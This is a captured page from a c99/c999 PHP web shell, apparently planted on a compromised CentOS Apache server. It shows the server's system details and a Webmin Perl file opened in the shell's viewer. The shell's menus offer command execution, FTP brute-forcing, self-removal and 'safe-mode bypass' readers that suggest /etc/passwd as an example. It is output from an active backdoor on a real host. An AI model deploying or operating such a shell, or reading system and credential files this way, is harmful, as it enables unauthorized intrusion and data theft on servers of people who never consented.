!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/webmin/   drwxr-xr-x
Free 53.79 GB of 127.8 GB (42.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     edit_ui.cgi (2.38 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# edit_ui.cgi
# Edit user interface options

require './webmin-lib.pl';
&ui_print_header(undef, $text{'ui_title'}, "");

print $text{'ui_desc'},"<p>\n";

print &ui_form_start("change_ui.cgi", "post");
print &ui_table_start($text{'ui_header'}, undef, 2);

for($i=0; $i<@cs_names; $i++) {
    $cd = $cs_codes[$i];
    print &ui_table_row($cs_names[$i],
        &ui_opt_textbox($cd, $gconfig{$cd}, 8, $text{'ui_default'},
                $text{'ui_rgb'}));
    }

print &ui_table_row($text{'ui_texttitles'},
    &ui_yesno_radio("texttitles", int($gconfig{'texttitles'})));

print &ui_table_row($text{'ui_sysinfo'},
    &ui_select("sysinfo", int($gconfig{'sysinfo'}),
           [ map { [ $_, $text{'ui_sysinfo'.$_} ] } (0, 1, 4, 2, 3) ]));

print &ui_table_row($text{'ui_hostnamemode'},
    &ui_select("hostnamemode", int($gconfig{'hostnamemode'}),
           [ map { [ $_, $text{'ui_hnm'.$_} ] } (0 .. 3) ]).
    " ".&ui_textbox("hostnamedisplay", $gconfig{'hostnamedisplay'}, 20));

print &ui_table_row($text{'ui_showlogin'},
    &ui_yesno_radio("showlogin", int($gconfig{'showlogin'})));

print &ui_table_row($text{'ui_showhost'},
    &ui_yesno_radio("showhost", int($gconfig{'showhost'})));

print &ui_table_row($text{'ui_feedback'},
    &ui_opt_textbox("feedback", $gconfig{'feedback_to'}, 20,
            $webmin_feedback_address));

print &ui_table_row($text{'ui_feedbackmode'},
    &ui_radio("nofeedbackcc", int($gconfig{'nofeedbackcc'}),
          [ [ 0, $text{'yes'} ], [ 1, $text{'ui_feednocc'} ],
            [ 2, $text{'no'} ] ]));

print &ui_table_row($text{'ui_dateformat'},
    &ui_select("dateformat", $gconfig{'dateformat'} || "dd/mon/yyyy",
           [ map { [ $_, $text{'ui_dateformat_'.$_} ] }
             @webmin_date_formats ]));

print &ui_table_row($text{'ui_width'},
    &ui_opt_textbox("width", $gconfig{'help_width'}, 5,
            "$text{'default'} (400)"));

print &ui_table_row($text{'ui_height'},
    &ui_opt_textbox("height", $gconfig{'help_height'}, 5,
            "$text{'default'} (400)"));

# Dialog box size options
print &ui_table_hr();

foreach $db ("file", "user", "users", "date", "module", "modules") {
    ($w, $h) = split(/x/, $gconfig{'db_size'.$db});
    print &ui_table_row($text{'ui_size'.$db},
        &ui_radio("size".$db."_def", $w ? 0 : 1,
            [ [ 1, $text{'default'} ],
              [ 0, &ui_textbox("size".$db."_w", $w, 4)." X ".
                   &ui_textbox("size".$db."_h", $h, 4) ] ]));
    }

print &ui_table_end();
print &ui_form_end([ [ "save", $text{'save'} ] ]);

&ui_print_footer("", $text{'index_return'});


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0103 ]--